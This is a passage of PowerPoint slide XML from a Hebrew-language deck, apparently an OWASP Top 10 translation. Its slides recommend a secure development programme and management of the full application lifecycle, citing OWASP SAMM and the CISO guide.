                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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+DAT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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שיטת עבודה ונתונים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId34" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>23</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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22"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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+ACK</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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תודות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" noProof="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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId35" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>24</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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23"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="627353475"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8153400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="335543">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>התלו בתוכנית הפיתוח המאובטח</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> כעת</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7817857">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>פיתוח מאובטח כבר אינו אופציונאלי. בין העלייה בכמות המתקפות לבין לחצי הרגולציה, ארגון חייבים לממש תהליכים ויכולות אפקטיביות להגנה על יישומים וממשקי פיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>APIs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>). בהינתן כמויות קוד במספר רב של יישומים וממשקי פיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>APIs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) אשר כבר בסביבות ייצור, ארגונים רבים נאבקים להתמודד עם כמויות גדולות של חולשות אבטחה.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ממליץ לארגונים ליישם תוכנית פיתוח מאובטח על-מנת לקבל תובנות ולייעל את האבטחה עבור כלל היישומים וממשקי הפיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>APIs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>). על-מנת להשיג פיתוח מאובטח נדרש שחלקים רבים בארגון יעבדו בשיתוף פעולה וביעילות, לרבות צוותי אבטחת המידע והביקורת, צוותי הפיתוח, גורמים עסקיים וההנהלה הבכירה. אבטחת מידע צריכה להיות גלויה וניתנת למדידה, כך שהגורמים השונים יוכלו לראות ולהבין את נקודת המבט של הארגון בנושא פיתוח מאובטח. התמקד בפעילויות ובתוצרים אשר בפועל מסייעים לייעל את אבטחת המידע של הארגון ע"י הסרה או צמצום הסיכון. המדריכים </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP SAMM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Guide for CISOs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הם המקור למרבית הפעילויות המופיעות ברשימה מטה.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>+O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    מה הדב</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>ר הבא עבור ארגונים</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1986290979"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2951820"/>
          <a:ext cx="8686800" cy="60960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2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D3F9A383-1D7C-437C-BD6E-2E22B4AF47C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5589240" y="8239268"/>
            <a:ext cx="1215135" cy="383182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1050" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ספק ראייה למנהלים</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="499726717"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8153400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="335366">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>נהלו את מחזור החיים השלם של היישום</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7818034">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישומים שייכים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> למרבית המערכות המורכבות אשר אנשים יוצרים ומתחזקים בצורה שוטפת. ניהול תשתיות מחשוב עבור יישום אמור להתבצע ע"י מומחי מחשוב האמונים על כל מחזור חיי התשתית של היישום. אנו ממליצים להגדיר את תפקיד ניהול היישום עצמו כחלק מובנה מאחריות מנהל המערכת. מנהל המערכת אחראי על כל מחזור חיי תשתית המערכת, החל משלב איסוף הדרישות ועד תהליך גריעת המערכת, אשר לרוב נוטים להזניח נושא זה.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="0" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-AU" sz="900" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
